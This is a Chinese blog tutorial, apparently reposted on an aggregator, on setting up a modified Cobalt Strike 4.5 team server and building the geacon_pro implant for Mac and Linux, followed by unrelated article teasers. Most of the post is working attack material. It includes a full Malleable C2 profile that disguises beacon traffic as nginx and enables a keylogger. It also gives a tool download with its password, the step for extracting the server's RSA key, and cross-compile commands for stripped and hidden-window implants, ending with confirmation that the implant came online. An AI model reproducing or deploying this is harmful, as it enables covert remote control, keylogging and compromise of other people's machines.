geacon_pro配合catcs4.5上线Mac、Linux

我的个人博客: xzajyjs.cn

一些链接

Try师傅的catcs4.5项目: https://github.com/TryGOTry/CobaltStrike_Cat_4.5,最新版解压密码见:https://www.nctry.com/2708.html

geacon_pro: https://github.com/testxxxzzz/geacon_pro

BeaconTool.jar: https://xzajyjs.lanzouc.com/i76gk15ncw0j,密码:0*rL~F8<Mq

catcs4.5部署

修改server端和client端的properties,保持一致。

这里使用默认的geacon_profile进行测试,上传到server端,保存为geacon.profile:

set sleeptime "3000";https-certificate {set C "KZ";set CN "foren.zik";set O "NN Fern Sub";set OU "NN Fern";set ST "KZ";set validity "365";
}http-get {set uri "/www/handle/doc";client {metadata {base64url;prepend "SESSIONID=";header "Cookie";}}server {header "Server" "nginx/1.10.3 (Ubuntu)";header "Content-Type" "application/octet-stream";header "Connection" "keep-alive";header "Vary" "Accept";header "Pragma" "public";header "Expires" "0";header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";output {mask;netbios;prepend "data=";append "%%";print;}}
}http-post {set uri "/IMXo";client {id {				mask;netbiosu;parameter "doc";}output {mask;base64url;prepend "data=";append "%%";		print;}}server {header "Server" "nginx/1.10.3 (Ubuntu)";header "Content-Type" "application/octet-stream";header "Connection" "keep-alive";header "Vary" "Accept";header "Pragma" "public";header "Expires" "0";header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";output {mask;netbios;prepend "data=";append "%%";print;}}
}post-ex {set spawnto_x86 "c:\\windows\\syswow64\\rundll32.exe";set spawnto_x64 "c:\\windows\\system32\\rundll32.exe";set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";set keylogger "SetWindowsHookEx";
}

然后修改CatServer.properties中的参数CatServer.profile为我们生成的profile文件

CatServer.profile = geacon.profile

运行服务端

chmod +x teamserver TeamServer.prop
sudo ./teamserver

image-20230817173558007

客户端连接

image-20230817173632855

image-20230817173813029

接下来生成一个监听器listener,主要要使用https,如果是http需要将geacon_proconfig.gosslHTTP改成"http://"

image-20230817174311268

生成geacon_pro

git clone https://github.com/testxxxzzz/geacon_pro.git
cd geacon_pro

如果使用readme中默认的profile的话config.go中有两处需要修改,

image-20230817174025846

获取RsaPublicKey

使用BeaconTool工具,读取server端的隐藏文件.cobaltstrike.beacon_keys

java -jar BeaconTool.jar -i .cobaltstrike.beacon_keys -rsa

image-20230817174511150

复制其中的PUBLIC KEY至config中对应位置,修改C2地址为监听器的url

go编译生成geacon,例如:

# arm mac
export GOOS="darwin" && export GOARCH="arm64" && go build -ldflags "-s -w" main.go
# x86 windows
export GOOS="windows" && export GOARCH="amd64" && go build -ldflags "-H windowsgui -s -w" main.go

image-20230817174824822

观察到上线成功

image-20230817175243122

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/45358.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

用 PyTorch 编写分布式应用程序

用 PyTorch 编写分布式应用程序

用 PyTorch 编写分布式应用程序 在这个简短的教程中&#xff0c;我们将介绍 PyTorch 的分布式软件包。 我们将了解如何设置分布式设置&#xff0c;使用不同的交流策略以及如何仔细查看软件包的内部结构。 设定 PyTorch 中包含的分布式软件包(即torch.distributed&#xff09…
阅读更多...
C++中的运算符总结(4):逻辑运算符(上)

C++中的运算符总结(4):逻辑运算符(上)

C中的运算符总结&#xff08;4&#xff09;&#xff1a;逻辑运算符&#xff08;上&#xff09; 8、逻辑运算 NOT、 AND、 OR 和 XOR 逻辑 NOT 运算用运算符!表示&#xff0c;用于单个操作数。表 1是逻辑 NOT 运算的真值表&#xff0c;这种运算将提供的布尔标记反转&#xff1…
阅读更多...
【LLM评估篇】Ceval | rouge | MMLU等指标

【LLM评估篇】Ceval | rouge | MMLU等指标

note 一些大模型的评估模型&#xff1a;多轮&#xff1a;MTBench关注评估&#xff1a;agent bench长文本评估&#xff1a;longbench&#xff0c;longeval工具调用评估&#xff1a;toolbench安全评估&#xff1a;cvalue&#xff0c;safetyprompt等 文章目录 note常见评测benchm…
阅读更多...
ubuntu20搭建环境使用的一下指令

ubuntu20搭建环境使用的一下指令

1.更新源 sudo vim etc/apt/sources.listdeb http://mirrors.aliyun.com/ubuntu/ xenial main deb-src http://mirrors.aliyun.com/ubuntu/ xenial maindeb http://mirrors.aliyun.com/ubuntu/ xenial-updates main deb-src http://mirrors.aliyun.com/ubuntu/ xenial-updates…
阅读更多...
Redis实现共享Session

Redis实现共享Session

Redis实现共享Session 分布式系统中&#xff0c;sessiong共享有很多的解决方案&#xff0c;其中托管到缓存中应该是最常用的方案之一。 1、引入依赖 <?xml version"1.0" encoding"UTF-8"?> <project xmlns"http://maven.apache.org/POM…
阅读更多...
设计模式详解-迭代器模式

设计模式详解-迭代器模式

类型&#xff1a;行为型模式 实现原理&#xff1a;提供一种方法顺序访问一个聚合对象中各个元素, 而又无须暴露该对象的内部表示。 作用&#xff1a;用于顺序访问集合对象的元素&#xff0c;不需要知道集合对象的底层表示 解决的问题&#xff1a;不同的方式遍历整个整合对象…
阅读更多...
openGauss学习笔记-44 openGauss 高级数据管理-存储过程

openGauss学习笔记-44 openGauss 高级数据管理-存储过程

文章目录 openGauss学习笔记-44 openGauss 高级数据管理-存储过程44.1 语法格式44.2 参数说明44.3 示例 openGauss学习笔记-44 openGauss 高级数据管理-存储过程 存储过程是能够完成特定功能的SQL语句集。用户可以进行反复调用&#xff0c;从而减少SQL语句的重复编写数量&…
阅读更多...
SpringBoot 学习(03): 弱语言的注解和SpringBoot注解的异同

SpringBoot 学习(03): 弱语言的注解和SpringBoot注解的异同

弱语言代表&#xff1a;Hyperf&#xff0c;一个基于 PHP Swoole 扩展的常驻内存框架 注解概念的举例说明&#xff1b; 说白了就是&#xff0c;你当领导&#xff0c;破烂事让秘书帮你去安排&#xff0c;你只需要批注一下&#xff0c;例如下周要举办一场活动&#xff0c;秘书将方…
阅读更多...
sql server安装报错 合成活动模板库(ATL) 失败

sql server安装报错 合成活动模板库(ATL) 失败

错误 “合成活动模板库(ATL) 规则失败“ 解决办法&#xff1a; 进入SQL Server 2008R2安装包目录找到文件&#xff1a;sqlsupport_msi&#xff0c;安装此文件之后&#xff0c;再安装SQL Server&#xff0c;便可解决该问题。C:\SQL Server 2008R2\new\SQL Server 2008R2\2052_CH…
阅读更多...
java Spring Boot yml多环境拆分文件管理优化

java Spring Boot yml多环境拆分文件管理优化

上文 java Spring Boot yml多环境配置 我们讲了多环境开发 但这种东西都放在一起 还是非常容易暴露信息的 并且对维护来讲 也不是非常的友好 这里 我们在resources下创建三个文件 分别叫 application-pro.yml application-dev.yml application-test.yml 我们直接将三个环境 转…
阅读更多...
web在线编辑器(vue版)

web在线编辑器(vue版)

目录 前言一、monaco-editor1、源码2、体积优化 二、ace-editor&#xff1f;1、源码2、体积优化 总结 前言 提示&#xff1a;这里可以添加本文要记录的大概内容&#xff1a; 例如&#xff1a;随着人工智能的不断发展&#xff0c;机器学习这门技术也越来越重要&#xff0c;很多…
阅读更多...
Android 广播发送流程分析

Android 广播发送流程分析

在上一篇文章中Android 广播阻塞、延迟问题分析方法讲了广播阻塞的分析方法&#xff0c;但是分析完这个问题&#xff0c;自己还是有一些疑问&#xff1a; 广播为啥会阻塞呢&#xff1f;发送给接收器就行了&#xff0c;为啥还要等着接收器处理完才处理下一个&#xff1f;由普通…
阅读更多...
esp-idf的电源管理——sleep功能

esp-idf的电源管理——sleep功能

目录 1 light sleep的时间补偿2 light sleep前的时钟校准3 为什么Flash下电比较特殊4 light sleep流程概览4.1 电源域的控制4.2 唤醒源的设置4.3 esp_light_sleep_start浏览4.4 esp_sleep_start浏览4.5 rtc sleep概览4.6 light sleep的时间调整5 最后看一下deep sleep1 light s…
阅读更多...
2308C++协程流程5

2308C++协程流程5

参考 #include <协程> #include "简异中.cpp" //用来中文定义的.构 任务{构 承诺型{任务 取中(){中{协柄<承诺型>::从承诺(*本)};}从不挂起 初挂起(){中{};}从不挂起 终挂起()无异{中{};}空 中空(){ 输出<<"取协程结果\n"; }//7空 对异…
阅读更多...
《Go 语言第一课》课程学习笔记(三)

《Go 语言第一课》课程学习笔记(三)

构建模式&#xff1a;Go 是怎么解决包依赖管理问题的&#xff1f; Go 项目的布局标准是什么&#xff1f; 首先&#xff0c;对于以生产可执行程序为目的的 Go 项目&#xff0c;它的典型项目结构分为五部分&#xff1a; 放在项目顶层的 Go Module 相关文件&#xff0c;包括 go.…
阅读更多...
kotlin的列表

kotlin的列表

在 kotlin中&#xff0c;列表是一种常见的数据结构&#xff0c;用于存储有序的元素集合。 kotlin的标准库提供了 List 接口及其实现类 ArrayList、LinkedList 等&#xff0c;以及一些扩展函数来操作和处理列表。 1.创建列表 // 创建一个可变列表 val mutableList mutableLis…
阅读更多...
JVM前世今生之JVM内存模型

JVM前世今生之JVM内存模型

JVM内存模型所指的是JVM运行时区域&#xff0c;该区域分为两大块 线程共享区域 堆内存、方法区&#xff0c;即所有线程都能访问该区域&#xff0c;随着虚拟机和GC创建和销毁 线程独占区域 虚拟机栈、本地方法栈、程序计数器&#xff0c;即每个线程都有自己独立的区域&#…
阅读更多...
帆软大屏2.0企业制作

帆软大屏2.0企业制作

&#xfffc; 数字化观点中心 / 当前页 如何从0-1制作数据大屏&#xff0c;我用大白话给你解释清楚了 文 | 商业智能BI相关文章 阅读次数&#xff1a;18,192 次浏览 2023-06-08 11:51:49 好莱坞大片《摩天营救》中有这么一个场景&#xff1a; &#xfffc; 你可以看见反派大b…
阅读更多...
flink1.17 实现 udf scalarFunctoin get_json_object 支持 非标准化json

flink1.17 实现 udf scalarFunctoin get_json_object 支持 非标准化json

特色 相比官方的json_value,该函数支持非标准化json,比如v是个object,但是非标准json会外套一层引号,内部有反引号. eg: {"kkkk2": "{\"kkkk1\":\"vvvvvvv\"}" } 支持value为 100L 这种java格式的bigint. {"k":999L…
阅读更多...
使用Nginx调用网关,然后网关调用其他微服务

使用Nginx调用网关,然后网关调用其他微服务

问题前提&#xff1a;目前我的项目是已经搭建了网关根据访问路径路由到微服务&#xff0c;然后现在我使用了Nginx将静态资源都放在了Nginx中&#xff0c;然后我后端定义了一个接口访问一个html页面&#xff0c;但是html页面要用到静态资源&#xff0c;这个静态资源在我的后端是…
阅读更多...
最新文章

Copyright @ 2022~2023